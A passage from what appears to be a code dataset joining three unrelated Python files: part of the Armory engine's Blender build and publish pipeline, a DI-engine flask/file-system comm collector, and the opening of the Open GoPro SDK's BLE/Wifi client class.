    if wrd.arm_write_config:
        write_data.write_config(resx, resy)
    # Write khafile.js
    enable_dce = state.is_publish and wrd.arm_dce
    import_logic = not state.is_publish and arm.utils.logic_editor_space() != None
    write_data.write_khafilejs(state.is_play, export_physics, export_navigation, export_ui, state.is_publish, enable_dce, ArmoryExporter.import_traits, import_logic)
    # Write Main.hx - depends on write_khafilejs for writing number of assets
    scene_name = arm.utils.get_project_scene_name()
    write_data.write_mainhx(scene_name, resx, resy, state.is_play, state.is_publish)
    if scene_name != state.last_scene or resx != state.last_resx or resy != state.last_resy:
        wrd.arm_recompile = True
        state.last_resx = resx
        state.last_resy = resy
        state.last_scene = scene_name
def compile(assets_only=False):
    """Assemble and launch the khamake build command for the current target.

    assets_only -- when True, pass --nohaxe/--noproject so only assets are
    converted (Haxe compilation is skipped or delegated to the server).
    NOTE(review): shadows the builtin ``compile`` at module scope.
    """
    wrd = bpy.data.worlds['Arm']
    fp = arm.utils.get_fp()
    os.chdir(fp)
    # Set build command
    target_name = state.target
    node_path = arm.utils.get_node_path()
    khamake_path = arm.utils.get_khamake_path()
    cmd = [node_path, khamake_path]
    kha_target_name = arm.utils.get_kha_target(target_name)
    if kha_target_name != '':
        cmd.append(kha_target_name)
    # Custom exporter
    if state.is_export:
        item = wrd.arm_exporterlist[wrd.arm_exporterlist_index]
        if item.arm_project_target == 'custom' and item.arm_project_khamake != '':
            for s in item.arm_project_khamake.split(' '):
                cmd.append(s)
    ffmpeg_path = arm.utils.get_ffmpeg_path() # Path to binary
    if ffmpeg_path != '':
        cmd.append('--ffmpeg')
        cmd.append(ffmpeg_path) # '"' + ffmpeg_path + '"'
    state.export_gapi = arm.utils.get_gapi()
    cmd.append('-g')
    cmd.append(state.export_gapi)
    # Pick the GLSL version per target platform
    if arm.utils.get_legacy_shaders() or 'ios' in state.target:
        if 'html5' in state.target or 'ios' in state.target:
            pass
        else:
            cmd.append('--shaderversion')
            cmd.append('110')
    elif 'android' in state.target or 'html5' in state.target:
        cmd.append('--shaderversion')
        cmd.append('300')
    else:
        cmd.append('--shaderversion')
        cmd.append('330')
    if '_VR' in wrd.world_defs:
        cmd.append('--vr')
        cmd.append('webvr')
    if arm.utils.get_rp().rp_renderer == 'Raytracer':
        cmd.append('--raytrace')
        cmd.append('dxr')
        # Pre-compile the DXR HLSL library before khamake runs
        dxc_path = fp + '/HlslShaders/dxc.exe'
        subprocess.Popen([dxc_path, '-Zpr', '-Fo', fp + '/Bundled/raytrace.cso', '-T', 'lib_6_3', fp + '/HlslShaders/raytrace.hlsl']).wait()
    if arm.utils.get_khamake_threads() > 1:
        cmd.append('--parallelAssetConversion')
        cmd.append(str(arm.utils.get_khamake_threads()))
    compilation_server = False
    cmd.append('--to')
    if (kha_target_name == 'krom' and not state.is_publish) or (kha_target_name == 'html5' and not state.is_publish):
        cmd.append(arm.utils.build_dir() + '/debug')
        # Start compilation server
        if kha_target_name == 'krom' and arm.utils.get_compilation_server() and not assets_only and wrd.arm_cache_build:
            compilation_server = True
            arm.lib.server.run_haxe(arm.utils.get_haxe_path())
    else:
        cmd.append(arm.utils.build_dir())
    if assets_only or compilation_server:
        cmd.append('--nohaxe')
        cmd.append('--noproject')
    print("Running: ", cmd)
    print("Using project from " + arm.utils.get_fp())
    # When the compilation server handles Haxe, chain to assets_done instead
    state.proc_build = run_proc(cmd, assets_done if compilation_server else build_done)
def build(target, is_play=False, is_publish=False, is_export=False):
    """Prepare the project for a build of *target*.

    Saves the blend and any dirty scripts, ensures a scene camera and the
    Sources/ package dir exist, then exports all data via export_data().
    The flags record the build mode in the module-level ``state``.
    """
    global profile_time
    profile_time = time.time()
    state.target = target
    state.is_play = is_play
    state.is_publish = is_publish
    state.is_export = is_export
    # Save blend
    if arm.utils.get_save_on_build():
        bpy.ops.wm.save_mainfile()
    log.clear()
    # Set camera in active scene
    active_scene = arm.utils.get_active_scene()
    if active_scene.camera == None:
        for o in active_scene.objects:
            if o.type == 'CAMERA':
                active_scene.camera = o
                break
    # Get paths
    sdk_path = arm.utils.get_sdk_path()
    raw_shaders_path = sdk_path + '/armory/Shaders/'
    # Set dir
    fp = arm.utils.get_fp()
    os.chdir(fp)
    # Create directories
    wrd = bpy.data.worlds['Arm']
    sources_path = 'Sources/' + arm.utils.safestr(wrd.arm_project_package)
    if not os.path.exists(sources_path):
        os.makedirs(sources_path)
    # Save external scripts edited inside Blender
    write_texts = False
    for text in bpy.data.texts:
        if text.filepath != '' and text.is_dirty:
            write_texts = True
            break
    if write_texts:
        # Temporarily switch the area to a text editor so text.save works
        area = bpy.context.area
        old_type = area.type
        area.type = 'TEXT_EDITOR'
        for text in bpy.data.texts:
            if text.filepath != '' and text.is_dirty and os.path.isfile(text.filepath):
                area.spaces[0].text = text
                bpy.ops.text.save()
        area.type = old_type
    # Save internal Haxe scripts
    for text in bpy.data.texts:
        if text.filepath == '' and text.name[-3:] == '.hx':
            with open('Sources/' + arm.utils.safestr(wrd.arm_project_package) + '/' + text.name, 'w') as f:
                f.write(text.as_string())
    # Export data
    export_data(fp, sdk_path)
    if state.target == 'html5':
        w, h = arm.utils.get_render_resolution(arm.utils.get_active_scene())
        write_data.write_indexhtml(w, h, is_publish)
        # Bundle files from include dir
        if os.path.isdir('include'):
            dest = '/html5/' if is_publish else '/debug/html5/'
            for fn in glob.iglob(os.path.join('include', '**'), recursive=False):
                shutil.copy(fn, arm.utils.build_dir() + dest + os.path.basename(fn))
def play_done():
    """Callback fired when the spawned player process exits: reset state."""
    state.proc_play = None
    state.redraw_ui = True
    log.clear()
def assets_done():
    """Callback fired when khamake finished its assets-only pass.

    On success, hands compilation over to the already-running haxe
    compilation server; on failure, reports and clears the build process.
    """
    if state.proc_build == None:
        return
    if state.proc_build.poll() == 0:
        # Connect to the compilation server
        os.chdir(arm.utils.build_dir() + '/debug/')
        server_cmd = [arm.utils.get_haxe_path(), '--connect', '6000', 'project-krom.hxml']
        state.proc_build = run_proc(server_cmd, compilation_server_done)
    else:
        state.proc_build = None
        state.redraw_ui = True
        log.print_info('Build failed, check console')
def compilation_server_done():
    """Callback fired when the haxe compilation server finishes.

    On success, swaps the freshly compiled krom.js.temp into place and
    continues with build_done(); on failure, reports and clears state.
    """
    if state.proc_build == None:
        return
    if state.proc_build.poll() != 0:
        state.proc_build = None
        state.redraw_ui = True
        log.print_info('Build failed, check console')
        return
    # Replace the old (read-only) krom.js with the newly built one.
    if os.path.exists('krom/krom.js'):
        os.chmod('krom/krom.js', stat.S_IWRITE)
        os.remove('krom/krom.js')
    os.rename('krom/krom.js.temp', 'krom/krom.js')
    build_done()
def build_done():
    """Callback fired when the khamake build process exits."""
    print('Finished in ' + str(time.time() - profile_time))
    if state.proc_build == None:
        return
    exit_code = state.proc_build.poll()
    state.proc_build = None
    state.redraw_ui = True
    if exit_code == 0:
        bpy.data.worlds['Arm'].arm_recompile = False
        build_success()
    else:
        log.print_info('Build failed, check console')
def patch():
    """Hot-patch the running Krom build.

    Re-exports the current scene and reruns khamake for assets only,
    then (via patch_done) notifies the player through krom.patch.
    """
    if state.proc_build != None:
        return
    assets.invalidate_enabled = False
    project_root = arm.utils.get_fp()
    os.chdir(project_root)
    scene = bpy.context.scene
    asset_path = arm.utils.get_fp_build() + '/compiled/Assets/' + arm.utils.safestr(scene.name) + '.arm'
    exporter.execute(bpy.context, asset_path, scene=scene)
    # Make sure the std shader includes are present.
    std_dir = arm.utils.build_dir() + '/compiled/Shaders/std'
    if not os.path.isdir(std_dir):
        raw_shaders_path = arm.utils.get_sdk_path() + '/armory/Shaders/'
        shutil.copytree(raw_shaders_path + 'std', std_dir)
    # Assets-only khamake invocation for the krom target.
    cmd = [arm.utils.get_node_path(), arm.utils.get_khamake_path(), 'krom']
    cmd += ['--shaderversion', '330',
            '--parallelAssetConversion', '4',
            '--to', arm.utils.build_dir() + '/debug',
            '--nohaxe', '--noproject']
    assets.invalidate_enabled = True
    state.proc_build = run_proc(cmd, patch_done)
def patch_done():
    """Ask the running player to reload the patched scene, then clear state."""
    write_patch('iron.Scene.patch();')
    state.proc_build = None
# Monotonically increasing id so the player can detect a new patch file.
patch_id = 0
def write_patch(js):
    """Write *js* preceded by a fresh sequence number to debug/krom/krom.patch."""
    global patch_id
    patch_id += 1
    patch_path = arm.utils.get_fp_build() + '/debug/krom/krom.patch'
    with open(patch_path, 'w') as f:
        f.write(str(patch_id) + '\n' + js)
def runtime_to_target():
    """Map the world's arm_runtime setting to a build target name."""
    wrd = bpy.data.worlds['Arm']
    return 'krom' if wrd.arm_runtime == 'Krom' else 'html5'
def get_khajs_path(target):
    """Return the debug-build JS output path for *target* (krom or browser)."""
    suffix = '/debug/krom/krom.js' if target == 'krom' else '/debug/html5/kha.js'
    return arm.utils.build_dir() + suffix
def play():
    """Build and run the project with the configured runtime.

    Decides whether a full Haxe recompile is needed by checking the JS
    output, khafile defs, target changes and trait source mtimes, then
    kicks off compile() (assets-only when nothing relevant changed).
    """
    global scripts_mtime
    wrd = bpy.data.worlds['Arm']
    log.clear()
    build(target=runtime_to_target(), is_play=True)
    khajs_path = get_khajs_path(state.target)
    if not wrd.arm_cache_build or \
       not os.path.isfile(khajs_path) or \
       assets.khafile_defs_last != assets.khafile_defs or \
       state.last_target != state.target:
        wrd.arm_recompile = True
    state.last_target = state.target
    # Trait sources modified
    state.mod_scripts = []
    script_path = arm.utils.get_fp() + '/Sources/' + arm.utils.safestr(wrd.arm_project_package)
    if os.path.isdir(script_path):
        new_mtime = scripts_mtime
        for fn in glob.iglob(os.path.join(script_path, '**', '*.hx'), recursive=True):
            mtime = os.path.getmtime(fn)
            if scripts_mtime < mtime:
                arm.utils.fetch_script_props(fn) # Trait props
                # Convert file path to dotted module name (strip .hx)
                fn = fn.split('Sources/')[1]
                fn = fn[:-3] #.hx
                fn = fn.replace('/', '.')
                state.mod_scripts.append(fn)
                wrd.arm_recompile = True
            if new_mtime < mtime:
                new_mtime = mtime
        scripts_mtime = new_mtime
    if len(state.mod_scripts) > 0: # Trait props
        arm.utils.fetch_trait_props()
    compile(assets_only=(not wrd.arm_recompile))
def build_success():
    """Post-build hook: launch the player or finalize a published package.

    In play mode, starts a local web server (Browser) or the Krom binary.
    In publish mode, optionally minifies JS, bundles per-platform Krom
    binaries, and prints where the exported package/project ended up.
    """
    log.clear()
    wrd = bpy.data.worlds['Arm']
    if state.is_play:
        if wrd.arm_runtime == 'Browser':
            # Start server
            os.chdir(arm.utils.get_fp())
            t = threading.Thread(name='localserver', target=arm.lib.server.run_tcp)
            t.daemon = True
            t.start()
            html5_app_path = 'http://localhost:8040/' + arm.utils.build_dir() + '/debug/html5'
            webbrowser.open(html5_app_path)
        elif wrd.arm_runtime == 'Krom':
            if wrd.arm_live_patch:
                # Truncate any stale patch file before the player starts
                open(arm.utils.get_fp_build() + '/debug/krom/krom.patch', 'w').close()
            if arm.utils.get_os() == 'win':
                bin_ext = '' if state.export_gapi == 'direct3d11' else '_' + state.export_gapi
            else:
                bin_ext = '' if state.export_gapi == 'opengl' else '_' + state.export_gapi
            krom_location, krom_path = arm.utils.krom_paths(bin_ext=bin_ext)
            os.chdir(krom_location)
            cmd = [krom_path, arm.utils.get_fp_build() + '/debug/krom', arm.utils.get_fp_build() + '/debug/krom-resources']
            if arm.utils.get_os() == 'win':
                cmd.append('--consolepid')
                cmd.append(str(os.getpid()))
            if wrd.arm_audio == 'Enabled':
                cmd.append('--sound')
            state.proc_play = run_proc(cmd, play_done)
    elif state.is_publish:
        sdk_path = arm.utils.get_sdk_path()
        target_name = arm.utils.get_kha_target(state.target)
        files_path = arm.utils.get_fp_build() + '/' + target_name
        if (target_name == 'html5' or target_name == 'krom') and wrd.arm_minify_js:
            # Minify JS
            minifier_path = sdk_path + '/lib/armory_tools/uglifyjs/bin/uglifyjs'
            if target_name == 'html5':
                jsfile = files_path + '/kha.js'
            else:
                jsfile = files_path + '/krom.js'
            args = [arm.utils.get_node_path(), minifier_path, jsfile, '-o', jsfile]
            proc = subprocess.Popen(args)
            proc.wait()
        if target_name == 'krom':
            # Copy Krom binaries
            if state.target == 'krom-windows':
                gapi = state.export_gapi
                ext = '' if gapi == 'direct3d11' else '_' + gapi
                krom_location = sdk_path + '/Krom/Krom' + ext + '.exe'
                shutil.copy(krom_location, files_path + '/Krom.exe')
                krom_exe = arm.utils.safestr(wrd.arm_project_name) + '.exe'
                os.rename(files_path + '/Krom.exe', files_path + '/' + krom_exe)
            elif state.target == 'krom-linux':
                krom_location = sdk_path + '/Krom/Krom'
                shutil.copy(krom_location, files_path)
                krom_exe = arm.utils.safestr(wrd.arm_project_name)
                os.rename(files_path + '/Krom', files_path + '/' + krom_exe)
                krom_exe = './' + krom_exe
            else:
                # macOS: move game files into the .app bundle
                krom_location = sdk_path + '/Krom/Krom.app'
                shutil.copytree(krom_location, files_path + '/Krom.app')
                game_files = os.listdir(files_path)
                for f in game_files:
                    f = files_path + '/' + f
                    if os.path.isfile(f):
                        shutil.move(f, files_path + '/Krom.app/Contents/MacOS')
                krom_exe = arm.utils.safestr(wrd.arm_project_name) + '.app'
                os.rename(files_path + '/Krom.app', files_path + '/' + krom_exe)
            # Serialize krom.js into krom.bin
            if wrd.arm_minify_js:
                cwd = os.getcwd()
                fp = files_path
                if state.target == 'krom-macos':
                    fp += '/' + krom_exe + '/Contents/MacOS'
                    krom_exe = './Krom'
                os.chdir(fp)
                args = [krom_exe, '.', '.', '--writebin']
                proc = subprocess.Popen(args)
                proc.wait()
                os.chdir(cwd)
                os.remove(fp + '/krom.js')
            # Rename
            ext = state.target.split('-')[-1] # krom-windows
            new_files_path = files_path + '-' + ext
            os.rename(files_path, new_files_path)
            files_path = new_files_path
        if target_name == 'html5':
            print('Exported HTML5 package to ' + files_path)
        elif target_name.startswith('ios') or target_name.startswith('osx'): # TODO: to macos
            print('Exported XCode project to ' + files_path + '-build')
        elif target_name.startswith('windows'):
            print('Exported Visual Studio 2017 project to ' + files_path + '-build')
        elif target_name.startswith('android-native'):
            print('Exported Android Studio project to ' + files_path + '-build/' + arm.utils.safestr(wrd.arm_project_name))
        elif target_name.startswith('krom'):
            print('Exported Krom package to ' + files_path)
        else:
            print('Exported makefiles to ' + files_path + '-build')
def clean():
    """Remove all generated build artifacts for the current Armory project.

    Deletes the build directories, compiled logic nodes, the generated
    khafile/korefile/Main.hx files and empty generated source folders, then
    invalidates cached material signatures and stops the compilation server
    so the next build starts from a clean state.
    """
    os.chdir(arm.utils.get_fp())
    wrd = bpy.data.worlds['Arm']
    # Remove build and compiled data
    try:
        if os.path.isdir(arm.utils.build_dir()):
            shutil.rmtree(arm.utils.build_dir(), onerror=remove_readonly)
        if os.path.isdir(arm.utils.get_fp() + '/build'):  # Kode Studio build dir
            shutil.rmtree(arm.utils.get_fp() + '/build', onerror=remove_readonly)
    except Exception:
        # Narrowed from a bare `except:` so Ctrl-C (KeyboardInterrupt) still propagates.
        # Best effort: files may be locked by a running editor/player.
        print('Armory Warning: Some files in the build folder are locked')
    # Remove compiled nodes
    pkg_dir = arm.utils.safestr(wrd.arm_project_package).replace('.', '/')
    nodes_path = 'Sources/' + pkg_dir + '/node/'
    if os.path.isdir(nodes_path):
        shutil.rmtree(nodes_path, onerror=remove_readonly)
    # Remove generated khafile/korefile/Main.hx
    for generated in ('khafile.js', 'korefile.js', 'Sources/Main.hx'):
        if os.path.isfile(generated):
            os.remove(generated)
    # Remove generated Sources/ dirs if they are empty
    if os.path.exists('Sources/' + pkg_dir) and not os.listdir('Sources/' + pkg_dir):
        shutil.rmtree('Sources/' + pkg_dir, onerror=remove_readonly)
    if os.path.exists('Sources') and not os.listdir('Sources'):
        shutil.rmtree('Sources/', onerror=remove_readonly)
    # Clear signatures to recache batched materials on the next build
    for mat in bpy.data.materials:
        mat.signature = ''
        mat.arm_cached = False
    # Stop the compilation server so it does not serve stale state
    if arm.utils.get_compilation_server():
        arm.lib.server.kill_haxe()
    print('Project cleaned')
|
flask_fs_collector.py | import os
import time
from typing import Union, Dict, Callable
from queue import Queue
from threading import Thread
from ding.utils import read_file, save_file, COMM_COLLECTOR_REGISTRY
from ding.utils.file_helper import save_to_di_store
from ding.interaction import Slave, TaskFail
from .base_comm_collector import BaseCommCollector
class CollectorSlave(Slave):
    """
    Overview:
        A slave, whose master is coordinator.
        Used to pass message between comm collector and coordinator.
    Interfaces:
        __init__, _process_task
    """

    # override
    def __init__(self, *args, callback_fn: Dict[str, Callable], **kwargs) -> None:
        """
        Overview:
            Init callback functions additionally. Callback functions are methods in comm collector.
        Arguments:
            - callback_fn (:obj:`Dict[str, Callable]`): Maps task names to comm collector methods.
        """
        super().__init__(*args, **kwargs)
        self._callback_fn = callback_fn
        # Task info of the task currently running; set by 'collector_start_task'.
        self._current_task_info = None

    # override
    def _process_task(self, task: dict) -> Union[dict, TaskFail]:
        """
        Overview:
            Process a task according to input task info dict, which is passed in by master coordinator.
            For each type of task, you can refer to corresponding callback function in comm collector for details.
        Arguments:
            - task (:obj:`dict`): Task dict. Must contain key "name".
        Returns:
            - result (:obj:`Union[dict, TaskFail]`): Task result dict, or task fail exception.
        """
        name = task['name']
        if name == 'resource':
            return self._callback_fn['deal_with_resource']()
        if name == 'collector_start_task':
            self._current_task_info = task['task_info']
            self._callback_fn['deal_with_collector_start'](self._current_task_info)
            return {'message': 'collector task has started'}
        if name == 'collector_data_task':
            result = self._callback_fn['deal_with_collector_data']()
            result['buffer_id'] = self._current_task_info['buffer_id']
            result['task_id'] = self._current_task_info['task_id']
            return result
        if name == 'collector_close_task':
            result = self._callback_fn['deal_with_collector_close']()
            result['task_id'] = self._current_task_info['task_id']
            return result
        # Unknown task type: report failure back to the master coordinator
        raise TaskFail(
            result={'message': 'task name error'}, message='illegal collector task <{}>'.format(name)
        )
@COMM_COLLECTOR_REGISTRY.register('flask_fs')
class FlaskFileSystemCollector(BaseCommCollector):
    """
    Overview:
        An implementation of comm collector, using flask and the file system.
    Interfaces:
        __init__, deal_with_resource, deal_with_collector_start, deal_with_collector_data, deal_with_collector_close,\
        get_policy_update_info, send_stepdata, send_metadata, start, close
    """

    # override
    def __init__(self, cfg: dict) -> None:
        """
        Overview:
            Initialization method.
        Arguments:
            - cfg (:obj:`EasyDict`): Config dict. Reads keys ['host', 'port', 'path_policy', 'path_data'].
        """
        BaseCommCollector.__init__(self, cfg)
        host, port = cfg.host, cfg.port
        self._callback_fn = {
            'deal_with_resource': self.deal_with_resource,
            'deal_with_collector_start': self.deal_with_collector_start,
            'deal_with_collector_data': self.deal_with_collector_data,
            'deal_with_collector_close': self.deal_with_collector_close,
        }
        self._slave = CollectorSlave(host, port, callback_fn=self._callback_fn)
        self._path_policy = cfg.path_policy
        self._path_data = cfg.path_data
        try:
            # makedirs(exist_ok=True) replaces the racy exists()+mkdir() pair and also creates
            # missing parents. Creation stays best-effort, but we only swallow OSError now
            # instead of every exception.
            os.makedirs(self._path_data, exist_ok=True)
        except OSError:
            pass
        # Bounded queue: collector production is throttled until the coordinator drains it.
        self._metadata_queue = Queue(8)
        self._collector_close_flag = False
        self._collector = None

    def deal_with_resource(self) -> dict:
        """
        Overview:
            Callback function in ``CollectorSlave``. Return how many resources are needed to start current collector.
        Returns:
            - resource (:obj:`dict`): Resource info dict, including ['gpu', 'cpu'].
        """
        return {'gpu': 1, 'cpu': 20}

    def deal_with_collector_start(self, task_info: dict) -> None:
        """
        Overview:
            Callback function in ``CollectorSlave``.
            Create a collector and start a collector thread of the created one.
        Arguments:
            - task_info (:obj:`dict`): Task info dict.
        Note:
            In ``_create_collector`` method in base class ``BaseCommCollector``, 4 methods
            'send_metadata', 'send_stepdata', 'get_policy_update_info', and policy are set.
            You can refer to it for details.
        """
        self._collector_close_flag = False
        self._collector = self._create_collector(task_info)
        self._collector_thread = Thread(target=self._collector.start, args=(), daemon=True, name='collector_start')
        self._collector_thread.start()

    def deal_with_collector_data(self) -> dict:
        """
        Overview:
            Callback function in ``CollectorSlave``. Get data sample dict from ``_metadata_queue``,
            which will be sent to coordinator afterwards.
        Returns:
            - data (:obj:`Any`): Data sample dict.
        """
        # Blocking get replaces the old empty()-then-sleep(0.1) polling loop:
        # same semantics (wait until an item is available), no busy-wait latency.
        return self._metadata_queue.get()

    def deal_with_collector_close(self) -> dict:
        """
        Overview:
            Callback function in ``CollectorSlave``. Stop the running collector, join its
            thread and return the collector's finish info.
        Returns:
            - finish_info (:obj:`dict`): The closed collector's finish info.
        """
        self._collector_close_flag = True
        finish_info = self._collector.get_finish_info()
        self._collector.close()
        self._collector_thread.join()
        del self._collector_thread
        self._collector = None
        return finish_info

    # override
    def get_policy_update_info(self, path: str) -> dict:
        """
        Overview:
            Get policy information in corresponding path.
        Arguments:
            - path (:obj:`str`): path to policy update information.
        Returns:
            - info (:obj:`dict`): the read policy info; ``None`` if the collector is closing.
        """
        if self._collector_close_flag:
            return
        path = os.path.join(self._path_policy, path)
        return read_file(path, use_lock=True)

    # override
    def send_stepdata(self, path: str, stepdata: list) -> None:
        """
        Overview:
            Save collector's step data in corresponding path (or in DI-store when available).
        Arguments:
            - path (:obj:`str`): Path to save data.
            - stepdata (:obj:`Any`): Data of one step.
        """
        # save_to_di_store is a module-level flag/callable: truthy when DI-store is configured
        if save_to_di_store:
            if self._collector_close_flag:
                return b'0' * 20  # return an object reference that doesn't exist
            return save_to_di_store(stepdata)

        if self._collector_close_flag:
            return
        name = os.path.join(self._path_data, path)
        save_file(name, stepdata, use_lock=False)

    # override
    def send_metadata(self, metadata: dict) -> None:
        """
        Overview:
            Store learn info dict in queue, which will be retrieved by callback function "deal_with_collector_data"
            in collector slave, then will be sent to coordinator.
        Arguments:
            - metadata (:obj:`Any`): meta data.
        """
        if self._collector_close_flag:
            return
        necessary_metadata_keys = {'data_id', 'policy_iter'}
        necessary_info_keys = {'collector_done', 'cur_episode', 'cur_sample', 'cur_step'}
        assert necessary_metadata_keys.issubset(metadata.keys()) or necessary_info_keys.issubset(metadata.keys())
        # Blocking put replaces the old full()-then-sleep(0.1) polling loop.
        self._metadata_queue.put(metadata)

    def start(self) -> None:
        """
        Overview:
            Start comm collector itself and the collector slave.
        """
        BaseCommCollector.start(self)
        self._slave.start()

    def close(self) -> None:
        """
        Overview:
            Close comm collector itself and the collector slave.
        """
        if self._end_flag:
            return
        while self._collector is not None:
            # NOTE(review): assumes the created collector exposes an ``info`` logging method
            self._collector.info("please first close collector")
            time.sleep(1)
        self._slave.close()
        BaseCommCollector.close(self)

    def __del__(self) -> None:
        # Last-resort cleanup; close() is idempotent via _end_flag.
        self.close()
|
gopro.py | # gopro.py/Open GoPro, Version 2.0 (C) Copyright 2021 GoPro, Inc. (http://gopro.com/OpenGoPro).
# This copyright was auto-generated on Wed, Sep 1, 2021 5:05:47 PM
"""Implements top level interface to GoPro module."""
from __future__ import annotations
import time
import enum
import queue
import logging
import threading
from queue import Queue
from pathlib import Path
from typing import Any, Dict, Final, Optional, Type, Callable, Union, Generic, Pattern
import wrapt
import requests
from open_gopro.exceptions import (
GoProNotInitialized,
InvalidOpenGoProVersion,
ResponseTimeout,
InvalidConfiguration,
ConnectionTerminated,
)
from open_gopro.ble import BLEController, BleUUID, BleDevice
from open_gopro.ble.adapters import BleakWrapperController
from open_gopro.wifi import WifiController
from open_gopro.wifi.adapters import Wireless
from open_gopro.util import SnapshotQueue, build_log_rx_str
from open_gopro.responses import GoProResp
from open_gopro.constants import CmdId, GoProUUIDs, StatusId, QueryCmdId, ProducerType
from open_gopro.api import Api, BleCommands, BleSettings, BleStatuses, WifiCommands, WifiSettings, Params
from open_gopro.communication_client import GoProBle, GoProWifi
logger = logging.getLogger(__name__)
KEEP_ALIVE_INTERVAL: Final = 60  # seconds between periodic BLE keep-alive messages
WRITE_TIMEOUT: Final = 5  # seconds to wait for a BLE write's notification response
GET_TIMEOUT: Final = 5  # seconds before a single HTTP GET attempt times out
HTTP_GET_RETRIES: Final = 5  # connection attempts before an HTTP GET is abandoned
class Interface(enum.Enum):
    """Enum to identify wireless interface"""

    WIFI = enum.auto()  # the HTTP-over-Wifi transport
    BLE = enum.auto()  # the Bluetooth Low Energy transport
def ensure_initialized(interface: Interface) -> Callable:
    """Build a decorator that raises if the given interface is not currently connected.

    Args:
        interface (Interface): wireless interface to verify

    Raises:
        GoProNotInitialized: Wireless interface is not connected

    Returns:
        Callable: Direct pass-through of callable after verification
    """
    # Map each interface to its connectivity predicate and failure message
    checks = {
        Interface.BLE: (lambda inst: inst.is_ble_connected, "BLE not connected"),
        Interface.WIFI: (lambda inst: inst.is_wifi_connected, "Wifi not connected"),
    }

    @wrapt.decorator
    def wrapper(  # pylint: disable=missing-return-doc
        wrapped: Callable, instance: GoPro, args: Any, kwargs: Any
    ) -> Any:
        check = checks.get(interface)
        if check is not None:
            is_connected, message = check
            if not is_connected(instance):
                raise GoProNotInitialized(message)
        return wrapped(*args, **kwargs)

    return wrapper
@wrapt.decorator
def acquire_ready_semaphore(wrapped: Callable, instance: GoPro, args: Any, kwargs: Any) -> Any:
    """Call method after acquiring ready semaphore.

    Release semaphore when done

    Args:
        wrapped (Callable): method to call
        instance (GoPro): instance that owns the method
        args (Any): positional arguments
        kwargs (Any): keyword arguments

    Returns:
        Any: result of method
    """
    # When housekeeping is disabled, there is no semaphore to coordinate on.
    if not instance._maintain_ble:
        return wrapped(*args, **kwargs)
    logger.trace(f"{wrapped.__name__} acquiring semaphore")  # type: ignore
    with instance._ready:
        logger.trace(f"{wrapped.__name__} has the semaphore")  # type: ignore
        result = wrapped(*args, **kwargs)
    logger.trace(f"{wrapped.__name__} released the semaphore")  # type: ignore
    return result
class GoPro(GoProBle, GoProWifi, Generic[BleDevice]):
    """The top-level BLE and Wifi interface to a GoPro device.

    See `Open GoPro <https://gopro.github.io/OpenGoPro/python_sdk>`_ for complete documentation.

    This will handle for BLE:

    - discovering device
    - establishing connections
    - discovering GATT characteristics
    - enabling notifications
    - discovering Open GoPro version
    - transferring data

    This will handle for Wifi:

    - finding SSID and password
    - establishing Wifi connection
    - transferring data

    It will also do some synchronization, etc:

    - ensuring camera is ready / not encoding before transferring data
    - sending keep alive signal periodically

    If no target arg is passed in, the first discovered GoPro device will be connected to.

    It can be used via context manager:

    >>> with GoPro() as gopro:
    >>>     gopro.ble_command.set_shutter(Params.Shutter.ON)

    Or without:

    >>> gopro = GoPro()
    >>> gopro.open()
    >>> gopro.ble_command.set_shutter(Params.Shutter.ON)
    >>> gopro.close()

    Args:
        target (Optional[Union[Pattern, BleDevice]], optional): Last 4 of camera name / serial number
            (i.e. 0456 for GoPro0456). Defaults to None (i.e. connect to first discovered GoPro)
        ble_adapter (Type[BLEController], optional): Class used to control computer's BLE connection / send data.
            Defaults to BleakWrapperController.
        wifi_adapter (Type[WifiController], optional): Class used to control computer's Wifi connection / send data.
            Defaults to Wireless.
        wifi_interface (str, optional): Set to specify the wifi interface the local machine will use to connect
            to the GoPro. If None (or not set), first discovered interface will be used.
        enable_wifi (bool, optional): Optionally do not enable Wifi if set to False. Defaults to True.
        maintain_ble (bool, optional): Optionally do not perform BLE housekeeping if set to False (used for
            testing). Defaults to True.
    """

    _base_url = "http://10.5.5.9:8080/"  #: Hard-coded Open GoPro base URL

    class _InternalState(enum.IntFlag):
        """State used to manage whether the GoPro instance is ready or not.

        The instance is READY exactly when no flag bits are set.
        """

        READY = 0
        ENCODING = 1 << 0  # set while the camera reports StatusId.ENCODING
        SYSTEM_BUSY = 1 << 1  # set while the camera reports StatusId.SYSTEM_READY as False
    def __init__(
        self,
        target: Optional[Union[Pattern, BleDevice]] = None,
        ble_adapter: Type[BLEController] = BleakWrapperController,
        wifi_adapter: Type[WifiController] = Wireless,
        wifi_interface: Optional[str] = None,
        enable_wifi: bool = True,
        maintain_ble: bool = True,
    ) -> None:
        """Build an (unopened) GoPro client. See the class docstring for argument semantics."""
        # Store initialization information
        self._enable_wifi_during_init = enable_wifi
        self._maintain_ble = maintain_ble
        self.id = target
        # Initialize GoPro Communication Client
        GoProBle.__init__(self, ble_adapter(), self._disconnect_handler, self._notification_handler, target)
        GoProWifi.__init__(self, wifi_adapter(wifi_interface))
        # We currently only support version 2.0
        self._api = Api(self, self)
        # Current accumulating synchronous responses, indexed by GoProUUIDs. This assumes there can only be one active response per BleUUID
        self._active_resp: Dict[BleUUID, GoProResp] = {}
        # Responses that we are waiting for.
        self._sync_resp_wait_q: SnapshotQueue = SnapshotQueue()
        # Synchronous response that has been parsed and are ready for their sender to receive as the response.
        self._sync_resp_ready_q: SnapshotQueue = SnapshotQueue()
        # For outputting asynchronously received information
        self._out_q: "Queue[GoProResp]" = Queue()
        self._listeners: Dict[ProducerType, bool] = {}
        # Set up events
        self._ble_disconnect_event = threading.Event()
        # Event starts set so _disconnect_handler treats a disconnect now as unexpected
        self._ble_disconnect_event.set()
        # Set up threads
        # Count of housekeeping threads that have not yet completed their first ready cycle
        self._threads_waiting = 0
        # If we are to perform BLE housekeeping
        if self._maintain_ble:
            self._threads_waiting += 2
            # Set up thread to send keep alive
            self._keep_alive_thread = threading.Thread(
                target=self._periodic_keep_alive, name="keep_alive", daemon=True
            )
            # Set up thread to block until camera is ready to receive commands
            self._ready = threading.BoundedSemaphore(value=1)
            self._state_condition = threading.Condition()
            # Start pessimistic: assume encoding and busy until status notifications say otherwise
            self._internal_state = GoPro._InternalState.ENCODING | GoPro._InternalState.SYSTEM_BUSY
            self._state_thread = threading.Thread(target=self._maintain_state, name="state", daemon=True)
    def __enter__(self) -> "GoPro":  # pylint: disable=missing-return-doc
        """Context manager entry: open BLE (and Wifi, if enabled) connections."""
        self.open()
        return self

    def __exit__(self, *_: Any) -> None:
        """Context manager exit: tear down all connections (exceptions are not suppressed)."""
        self.close()

